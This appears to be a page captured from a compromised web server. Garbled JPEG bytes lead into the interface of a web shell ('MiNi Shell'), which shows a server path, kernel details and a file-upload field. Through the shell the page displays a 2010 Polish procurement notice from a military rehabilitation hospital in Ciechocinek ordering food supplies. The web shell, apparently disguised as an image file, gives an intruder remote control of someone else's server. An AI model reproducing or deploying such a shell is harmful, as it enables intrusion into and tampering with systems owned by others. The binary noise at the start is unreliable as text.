JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100119/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100119/14992-N-2010.html

<p class="kh_header"><b>Ciechocinek: Artykuły spożywcze</b><br>
<b>Numer ogłoszenia: 14992 - 2010; data zamieszczenia: 19.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 22 Wojskowy Szpital Uzdrowiskowo-Rehabilitacyjny SP ZOZ , ul. Wojska Polskiego 5, 87-720 Ciechocinek, woj. kujawsko-pomorskie, tel. 054 28 332 11, faks 054 283 3211 w. 3202.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.22wszur.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Artykuły spożywcze.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa artykułów spożywczych  wyszczególnionych w załączniku nr 2 do SIWZ
Asortyment	Ilość kg-l-rocznie
2	3
Kawa rozpuszczalna typu Nessscafe a 100g	20
Kawa rozpuszczalna typu Nessscafe a 2g	60
Kawa naturalna mielona100g	10
Herbata typu Saga exp0,35kg	450
Herbata zielona exp.0,10kg	15
Herbata zielona  z dodatkiem owoców cytrusowych (1,3 g) typu LIPTON	20
Herbata typu Lipton exp. 0,20kg	60
Herbata owoc. ( dzika róża, malina)  0,02kg	10
Herbata owoc. ( dzika róża, owoce leśne)  0,04kg	10
Herbata owoc. ( dzika róża, liść mięty, skórki owoców cytrusowych)  0,02kg	10
Herbata ziołowa mięta   0,03kg	30
Herbata ziołowa rumianek 0,03 kg	20
Soki owocowe 2L karton jabłko	650
Soki owocowe 2L karton pomarańcz.	650
Soki owocowe 2L karton grapefruit	650
Soki owocowe 1,0 L karton czarna porz	400
Soki owocowe 0,20L karton pomarańcz.	300
Sok marchwiowy karton 1L	400
Sok pomidorowy karton 1L	600
Kompot wiśniowy0,9	1000
Kompot truskawkowy0,9	1000
Kompot czarna porzeczka 0,9	1000
Cukier kryształ 1kg	4500
Cukier puder  0,5kg	30
Jabłka prażone0,9kg	400
Dżem brzoskwinia wysoko słodz.1,05kg	250
Dżem czarna porze. wysoko słodz.1,05kg	250
Dżem malinowy wysoko słodz.1,05kg 	250
Dżem wiśniowy wysoko słodz.1,05kg	250
Dżem śliwka wysoko słodz.1,05kg	250
Dżem wiśniowy nisko słodz.1,05kg	25
Dżem truskawkowy nisko słodz.1,05kg	25
Dżem morelowy nisko słodz. 1,05kg	25
Powidła śliwkowe 1kg	200
Rodzynki luz	100
Wiórki kokosowe1,0kg	20
Śliwki susz. kalifornijskie luz	150
Morele suszone 0,5kg	150
Miód naturalny 1,2kg	200
Grzyby susz. podgrzybek 1kg	10
Koncentrat pomi.30% typ Złoty Baża.1kg	600
Groch cały luz	80
Groch połówki łuskany 5kg 	120
Fasola Jaś 5kg	300
Słonecznik łuskany 0,5kg	50
Pestki dyni 5kg	10
Siemię lniane 5kg	30
Musli czekoladowe 0,35kg	15
Musli miodowe 0,35kg	15
Migdały płatki 0,1kg	7
Migdały 0,1kg	40
Orzechy włoskie0,5kg	40
Budyń smakowy typu Delekta  1kg	100
Galaretki owoc. Typu Delekta 1kg	100
Kisiel smakowy typu Delekta 1kg	60
Śnieżka na mleko 0,06kg	26
Kakao 0,1kg	30
Paluszki ptysiowe z cukrem 2kg 	250
Paluszki ptysiowe bez cukru 2kg	50
Groszek ptysiowy z ciasta parzonego 1kg wyrób o przedłużonej trwałości	60
Delicje szampańskie 0,15kg	25
Krakersy 0,18kg	70
Ciastka kruche 3kg	40
Wafel teatralny 0,05kg	160
Paluszki słone 0,1kg	20
Suchary delikatesowe 0,25kg	25
Soczewica 5kg	100
Soja 5kg	70
Chrzan tarty 0,9kg	350
Sezam luz 	10
Płatki kukurydziane 0,25kg	15
Kawa zbożowa 5kg	140
Syrop owocowy w butelkach 0,5L	40
Czekolada mleczna typu WEDEL 0,1g	10
Czekolada gorzka typu WEDEL 0,1 kg	15
Cukierki czekoladowe 2,5 kg	40
Wafelki 3kg b/czekolady luz	40
Ciastka kruche w czekoladzie luz	30
Wafelki w czekoladzie luz	20
	
PAKIET II	
Asortyment	Ilość kg-l-rocznie
2	3
Kukurydza konserwowa 0,4 kg	200
Groszek konserwowy 0,4kg	300
Szparagi całe 0,4kg	25
Kiełki fasoli 0,4kg	20
Fasola konserwowa 0,85kg	100
Fasola konserwowa czerwona 0,4kg	100
Brzoskwinie w syrop.typu Splendor0,85kg 	650
Ananasy w syrop.plastry,typu Valfruta0,58kg	800
Gruszki w syropie0,85kg	200
Papryka kons. 3,72kg 	300
Ogórki kons. 0,9kg	430
Kukurydza kolby 0,4kg	10
Kapary 0,72kg	50
Pieczarki  marynowane 0,9kg	20
Maślak marynowany 0,2kg	5
Kiełki soi 0,4kg	10
Dynia w occie 0,9kg	200
Czereśnie koktajlowe 0,225kg	15
Oliwki czarne 0,9kg	50
Oliwki zielone 0,9kg 	40
Cebulka marynowana żółta 1,7 kg	30
Pomidory w puszkach 2,55kg	12
Cebulka marynowana srebrna 1,7kg	45
Jagoda w syropie 0,24kg	60
Żurawina0,23kg	80
	
PAKIET III	
	
Asortyment	Ilość kg-L rocznie
2	3
Pieprz naturalny typu Kamis 1 kg	80
Kwasek cytr. 0,5 kg	50
Majeranek 0,5 kg	10
Przyprawa do zup w pły.	350
Bazylia 0,5 kg	5
Koperek susz. 0,5 kg	30
Kurkuma 0,5 kg	5
Przyprawa typu Kucharek 1 kg	100
Papryka mielona 0,5 kg	10
Przyprawa  do drobiu 1 kg	20
Liść     laurowy 0,5 kg	3
Imbir typu Kamis 0,5 kg	3
Gałka muszkatołowa typu Kamis 0,5 kg	2
Oregano typu Kamis 0,5 kg	3
Kminek typu Kamis 0,5 kg	3
Pieprz ziołowy typu Kamis 1 kg	15
Przyprawa curry typu Kamis 0,5 kg	3
Cukier waniliowy 0,5 kg	15
Przyprawa do ryb 0,5 kg	15
Żelatyna 1kg	80
Ocet 0,5L	400
Ocet winny 0,5L	5
Musztarda 1kg 	150
Sól 1kg	1500
Majonez typu Fanex 4kg	500
Majonez łagodny 4kg	500
Ketchup typu Fanex 1kg	180
	
	
PAKIET IV	
Asortyment	Ilość kg-L rocznie
2	3
Makaron typu Malma:	 
Gniazdka nitka 1 kg	300
Gniazdka wstążka 1 kg	300
Kolanka 1 kg	400
Spaghetti długie 1 kg	400
Makaron chiński sojowy 0,35 kg	50
Makaron lazania 0,5 kg	150
Mąka ziemniaczana 1 kg	150
Kasza gryczana	300
Kasza kukurydziana 0,35 kg	30
Kasza kuskus 0,35kg	20
Ryż długoziarnisty 1kg 	1000
Ryż dziki 1kg 	60
	
PAKIET V	
Asortyment	Ilość kg-L rocznie
2	3
Olej uniwersalny kujawski 1l	2000
Oliwa z oliwek  EXTRA VIRGIN 1 l	250
Masło roślinne 0,5 kg	1500
Olej z pestek winogrona 0,5 l	10
	
	
PAKIET VI	
Asortyment	Ilość kg-L rocznie
2	3
Mąka pszenna typ 500	3000
Mąka żytnia	100
Kasza jęczmienna	700
Płatki owsiane 	400
Otręby owsiane	250
Kasza owsiana	300
Kasza manna	400
W pozycjach -typu- dopuszcza się produkty jedynie równoważne lub lepsze..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie niniejszego zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące: 1.	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, 2.	posiadania wiedzy i doświadczenia, 3.	dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, 4.	sytuacji ekonomicznej i finansowej, 2. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 3. Wykonawcy, którzy nie wykażą spełnienia warunków udziału w postępowaniu podlegać będą wykluczeniu z udziału w postępowaniu. Ofertę wykonawcy wykluczonego uznaje się za odrzuconą. 4. Z udziału w niniejszym postępowaniu wyklucza się wykonawców, którzy podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 Prawa zamówień publicznych. 5. Zamawiający odrzuca ofertę, jeżeli: 1.	jest niezgodną z ustawą. 2.	jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, z zastrzeżeniem art. 87 ust. 2 pkt. 3 Prawa zamówień publicznych. 3.	jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji. 4.	zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia. 5.	została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia. 6.	zawiera błędy w obliczeniu ceny. 7.	wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt. 3 Prawa zamówień publicznych 8.	jest nieważna na podstawie odrębnych przepisów, 6. Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia-niespełna..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A. Na ofertę składają się następujące dokumenty i załączniki: A.1) Formularz ofertowy - wypełniony i podpisany przez wykonawcę  A.2) Formularz cenowy - wypełniony i podpisany przez wykonawcę A.3) Wykaz osób do kontaktów z Zamawiającym A.4.) Oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Prawa zamówień publicznych. A.5) Oświadczenie o braku podstaw do wykluczenia z postępowania o udzielenie zamówienia z art. 24 ust. 1 Prawa zamówień publicznych   A.6) Projekt  umowy - parafowany przez wykonawcę B. W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia z art. 24 ust 1 Prawa zamówień publicznych wykonawca składa następujące dokumenty:   B.1) Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a przypadku osób fizycznych oświadczenie wymienione w pkt. A.5) niniejszej specyfikacji.  B.2) Dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych.  C. W celu wykazania spełnienia przez wykonawcę warunków o których mowa w art. 22 ust. 1 pkt. 1) do 3) ustawy Pzp, należy złożyć następujące dokumenty:  C.1) Koncesja, zezwolenie lub licencja , jeżeli przepisy prawa wymagają tego.  [x]  D. W celu wykazania spełnienia przez wykonawcę warunków o których mowa w  art. 22 ust. 1 pkt. 4) ustawy Pzp, należy złożyć następujące dokumenty:  D.3) Opłaconą polisę, a w przypadku jej braku inny dokumentu potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. Suma ubezpieczenia od OC winna opiewać  na kwotę co najmniej 100 tys. zł.  Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez zamawiającego warunku. E. Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej: E.1) Zamiast dokumentów, o których mowa w pkt. B.1 składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 1) nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. E.3) Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów wskazanych w niniejszym pkt. E zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawionych nie wcześniej niż w terminach określonych w niniejszym pkt.E. F. Dokumenty wymagane w przypadku składania oferty wspólnej:  F.1 Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku dla ustanowionego pełnomocnika do oferty należy załączyć pełnomocnictwo do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy.  [x]  F.2) Oferta winna zawierać: oświadczenia i dokumenty opisane w pkt.B.1dla każdego partnera z osobna, pozostałe dokumenty składane są wspólnie.  [x]  G. W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym w niniejszej specyfikacji istotnych warunków zamówienia do oferty należy dołączyć następujące dokumenty: nie dotyczy H. Postanowienia dotyczące składanych dokumentów H.1) Jeżeli wykonawca wykazując spełnienie warunków, o których mowa w pkt. C i D polega na zasobach innych podmiotów zobowiązany jest wykazać, że w stosunku do tych podmiotów brak jest podstaw wykluczenia z postępowania o udzielenie zamówienia poprzez złożenie razem z ofertą dokumentów wymienionych B.1) dotyczących każdego z tych podmiotów, o ile podmioty te będą brały udział w realizacji części zamówienia H.2) Dokumenty w niniejszym postępowaniu mogą być składane w oryginale lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę lub osobę - osoby uprawnione do podpisania oferty z dopiskiem za zgodność z oryginałem
.H.3) W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku podmiotów, o których mowa w pkt. H.1), kopie dokumentów dotyczących każdego z tych podmiotów winny być poświadczane za zgodność z oryginałem przez te podmioty H.4) Oferta, składane dokumenty oraz oświadczenia podpisane przez upoważnionego przedstawiciela wykonawcy wymagają załączenia właściwego pełnomocnictwa lub umocowania prawnego. H.5) Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę. H.6) Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości, co do jej prawdziwości..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.22wszur.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 22 Wojskowy Szpital Uzdrowiskowo Rehabilitacyjny SP ZOZ , ul. Wojska Polskiego 5 , 87-720 Ciechocinek.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.01.2010 godzina 09:00, miejsce: 22 Wojskowy Szpital Uzdrowiskowo Rehabilitacyjny SP ZOZ , ul. Wojska Polskiego 5 , 87-720 Ciechocinek- pokój nr 13 , administracja szpitala ( wyłącznie).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com